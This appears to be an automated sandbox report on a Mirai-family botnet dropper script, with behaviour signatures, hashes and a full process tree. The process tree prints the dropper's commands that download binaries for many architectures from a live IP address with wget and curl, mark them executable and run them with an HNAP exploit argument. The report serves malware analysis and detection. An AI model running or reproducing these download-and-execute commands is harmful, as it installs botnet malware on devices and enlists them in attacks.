Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
12-12-2024 02:40
Static task
static1
Behavioral task
behavioral1
Sample
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
-
Size
2KB
-
MD5
0414924f3d84871e5135cdc7433372ff
-
SHA1
e1a734139811fea57eae3589f8442ae29b9de623
-
SHA256
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e
-
SHA512
a9da40d314c1cfe932787b37785473bcff0dff63983ef3a86682951d30cdd2ae98bc0219ec26a06d70b816aedb3983ca713d0500f3f36967c408a50e23b76916
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
Contacts a large (104140) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1531 chmod 1578 chmod 1614 chmod 1632 chmod 1513 chmod 1587 chmod 1540 chmod 1560 chmod 1522 chmod 1549 chmod 1569 chmod 1596 chmod 1605 chmod 1623 chmod 1508 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Andrew 1509 Andrew /tmp/Andrew 1514 Andrew /tmp/Andrew 1523 Andrew /tmp/Andrew 1532 Andrew /tmp/Andrew 1541 Andrew /tmp/Andrew 1550 Andrew /tmp/Andrew 1561 Andrew /tmp/Andrew 1570 Andrew /tmp/Andrew 1579 Andrew /tmp/Andrew 1588 Andrew /tmp/Andrew 1597 Andrew /tmp/Andrew 1606 Andrew /tmp/Andrew 1615 Andrew /tmp/Andrew 1624 Andrew /tmp/Andrew 1633 Andrew -
Modifies Watchdog functionality 1 TTPs 28 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew File opened for modification /dev/misc/watchdog Andrew -
Enumerates active TCP sockets 1 TTPs 13 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew -
resource yara_rule behavioral1/files/fstream-3.dat upx behavioral1/files/fstream-6.dat upx behavioral1/files/fstream-8.dat upx behavioral1/files/fstream-10.dat upx behavioral1/files/fstream-12.dat upx behavioral1/files/fstream-14.dat upx behavioral1/files/fstream-16.dat upx behavioral1/files/fstream-20.dat upx behavioral1/files/fstream-22.dat upx -
Changes its process name 14 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /var/Sofia 1514 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1523 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1532 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1541 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1550 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1561 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1570 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1579 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1588 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1597 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1606 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1615 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1624 Andrew Changes the process name, possibly in an attempt to hide itself /var/Sofia 1633 Andrew -
Reads system network configuration 1 TTPs 13 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew File opened for reading /proc/net/tcp Andrew -
description ioc Process File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew File opened for reading /proc/ Andrew -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1534 wget 1538 curl -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/i486 curl File opened for modification /tmp/x86 curl File opened for modification /tmp/x86_64 curl File opened for modification /tmp/arm6 wget File opened for modification /tmp/sh4 curl File opened for modification /tmp/mips curl File opened for modification /tmp/arm4 curl File opened for modification /tmp/m68k curl File opened for modification /tmp/mpsl wget File opened for modification /tmp/arm6 curl File opened for modification /tmp/spc curl File opened for modification /tmp/arc curl File opened for modification /tmp/i686 wget File opened for modification /tmp/mpsl curl File opened for modification /tmp/arm4 wget File opened for modification /tmp/arm7 wget File opened for modification /tmp/ppc curl File opened for modification /tmp/arm5 wget File opened for modification /tmp/arm5 curl File opened for modification /tmp/sh4 wget File opened for modification /tmp/arm7 curl File opened for modification /tmp/ppc wget File opened for modification /tmp/Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh File opened for modification /tmp/mips wget File opened for modification /tmp/x86 wget File opened for modification /tmp/i686 curl File opened for modification /tmp/x86_64 wget
Processes
-
/tmp/b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh/tmp/b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh1⤵
- Writes file to tmp directory
PID:1500 -
/usr/bin/wgetwget http://37.114.41.90/bins/i4862⤵PID:1501
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/i4862⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/catcat i4862⤵PID:1507
-
-
/bin/chmodchmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
PID:1509
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/x862⤵
- Writes file to tmp directory
PID:1510
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/x862⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/catcat x862⤵PID:1512
-
-
/bin/chmodchmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x862⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:1514
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/i6862⤵
- Writes file to tmp directory
PID:1516
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/i6862⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/chmodchmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x862⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1523
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/x86_642⤵
- Writes file to tmp directory
PID:1525
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/x86_642⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/chmodchmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x86 x86_642⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1532
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1534
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1538
-
-
/bin/chmodchmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x86 x86_642⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1541
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/mpsl2⤵
- Writes file to tmp directory
PID:1543
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/mpsl2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/chmodchmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x86 x86_642⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1550
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/arm42⤵
- Writes file to tmp directory
PID:1552
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/arm42⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/chmodchmod +x Andrew arm4 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_642⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1561
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/arm52⤵
- Writes file to tmp directory
PID:1563
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/arm52⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/chmodchmod +x Andrew arm4 arm5 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_642⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1570
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/arm62⤵
- Writes file to tmp directory
PID:1572
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/arm62⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/chmodchmod +x Andrew arm4 arm5 arm6 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_642⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1579
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/arm72⤵
- Writes file to tmp directory
PID:1581
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/arm72⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/chmodchmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_642⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1588
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/ppc2⤵
- Writes file to tmp directory
PID:1590
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/ppc2⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/chmodchmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 ppc snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_642⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1597
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/spc2⤵PID:1599
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/spc2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/chmodchmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 ppc snap-private-tmp spc ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_642⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1606
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/m68k2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/m68k2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/chmodchmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 m68k mips mpsl netplan_pn_7vrk3 ppc snap-private-tmp spc ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_642⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1615
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/sh42⤵
- Writes file to tmp directory
PID:1617
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/sh42⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/chmodchmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 m68k mips mpsl netplan_pn_7vrk3 ppc sh4 snap-private-tmp spc ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_642⤵
- File and Directory Permissions Modification
PID:1623
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1624
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/arc2⤵PID:1626
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/arc2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/chmodchmod +x Andrew arc arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 m68k mips mpsl netplan_pn_7vrk3 ppc sh4 snap-private-tmp spc ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_642⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/Andrew./Andrew hnap.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1633
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD5b09e32f241911f4ddac45a1a7a19ba49
SHA117a7f213570aaea7f66b9c38091c9485fa0ea510
SHA25642828a483869a643cec73d181faff7f3a433c9570fc96a6bc63a2d8bc2b1f95c
SHA5121d7e94f3076da3e47e902cc523bb752d5333fcbe86a8f35e6ef11202b80e6021318ff8d60843a410a849dd46296e45ed452bfe01ea722df6bdbdd565fd954da5
-
Filesize
32KB
MD5bf55d7061cedeb10e6a3839353dc6d8c
SHA134b773230a77570ef0c6fced5ab9f125996e4daf
SHA256aae9d2a9669849b09b4e8ed8f3baeeb4c948ca80ebddd5004a57c2b6b7049fc9
SHA512555f6dec792e49927d5392fc8dae5174e8868c9acdddebd4d0a5b3386352df40c7342a82d0973979cdb5061ee347f4ebd33ce19ab98fbb6dcae293e1eb69c57e
-
Filesize
50KB
MD5d5af8f2bb8c7c3e39981ba0099fa1d1c
SHA1f12212c88dddb3c0298987b917c55063f942df88
SHA256fec20fde8f5cb8d571cee50a2bf8103c9e63c57b2bfd098693974389fd79c8d9
SHA51242b3455e467f11b68f000f6f375bd9d7f42d77c16184a3a6a36bbf4751e72a01b692032ee6d03a8ed398484cacbdb6231478d42099004f3674de84873c2e817e
-
Filesize
274B
MD5090e35476de39030dfeafbcf3d3e3f43
SHA1a4bd408cec5d1185b478e528cf60a9f5186e0b87
SHA2560085db6c6f0d1ba4e0ea26fcc04cd3afc69a900a9fd087079c4957364bf4dd1b
SHA51255c266d1a3bb285ec821ecac894c2f5dbae7798c08e4f829db0e8c06f22084a919ef0fb17a1ddf4640228453bee8555fa6f69025c398292c5c8382e3c466a181
-
Filesize
28KB
MD515fb222600a3061f5c8e5ef04e5298a6
SHA193b4a17632479c8a45e2554a18ea61ea7365c532
SHA256fff08f2a1a9c20d447ac5cacb89df1287bb830a2fc0cd5866d31d9f3ba653965
SHA51211e390838b35bdacfa84ebdfc076f564abc1538bc972895b81d2156be52177bb25d62662871ae624747cca29e089a7a9a6ef205db4c694a2c106641d33942c34
-
Filesize
34KB
MD56088a204e0792a10d3724e836fe699b7
SHA1fc1cf1010c99f155c46f94ec0529c8cea32c6055
SHA256345984c9618d8bbf1c6e4a70ea62edd4666132f3787dbf07ad118d620cab8a2e
SHA512bdf6dd68777d986f952a9d3aa5e505aaf360cda74d336c81f5ae1abebdebbdeb595f7bcdb26187f3c59fafbf545265b126435e3ead4346898f328e408bf8e48e
-
Filesize
34KB
MD5b8f2bf3e7c002718f12751cb02130d2e
SHA106919c90eae2564ee9ded3f343e2ec18839e411d
SHA256390f79cfca6cc7660d64c22208b4f2166807e5875da1a15336a9dccff130034d
SHA512adfccc7878b168cba5b9f9ce92f246bced0e15db876c28ed2f7e0ec5e344ec6652b643045ca79937de7655da4c71b77db2c778f8b8d11b196bfff156a7d16185
-
Filesize
30KB
MD5053488c4fc01a20ddb689a2212c33126
SHA11eff2d1947ee2d6481fdd2ab4b2a67fba3e18321
SHA2560a8cb5b485b059b98725ff4a6411faa3ea9f150082b46b0b3868ae0e31b6dd41
SHA51232d412546f202e9165cf6c905b46d52db20425b7ff7f90b98a739f6c7860b30c34e8bc5eaca4d6f23e25c6e88580990a6003fd9747d581e25098f3267e78f1f9
-
Filesize
65KB
MD59092bfedba4c884c57e8a36df072a135
SHA1d1f5c632f741fea6a9fb73c4bcb930ebe7313e60
SHA256164fb4af0b74ff37d983392a157a4d9b464391dee726dffcfc205c930a1b062f
SHA5120f87f9126e11c09f480cf7f74f69d76492f8a8a080afaff1dde7546bae685f48d98774ee50d3c760e77bbc736712fa05a82bf034cbc82ce8e66f1e9d53013b79
-
Filesize
28KB
MD554d07ade0004f03aaca028523d8f3eb6
SHA173606fc68439ea7ceb148f94d61dbe0235da8355
SHA256d1270e8be4de4713834930df984a515448ca8dd0acc7b0e03e5aa7fc4428882b
SHA51243ce9c67151734e6e907a4bf30c06e41b52d524c388273380506b604ce3fed2779ef057b282737b1e05c11055611a4bd0559567253fb1b0f3309114e20eadf4b
-
Filesize
28KB
MD59cc970e0631afa61a049848f4f368b12
SHA154d7d99f436e9c97da5bfdd43698bb1dbd679b29
SHA256681951c3fa70c2d14fe48e3c829f9f62f04f8fa9b430c0a87e849e397333dc16
SHA5129f5bcd759af164b0e22479d44806dce6d3ca3e2b62fa3ac154b83111804cd1ee1df4b549fff0e8ab72d2a2d66dadb0f8f1cc301fee83a711e5c4055c2ee3567e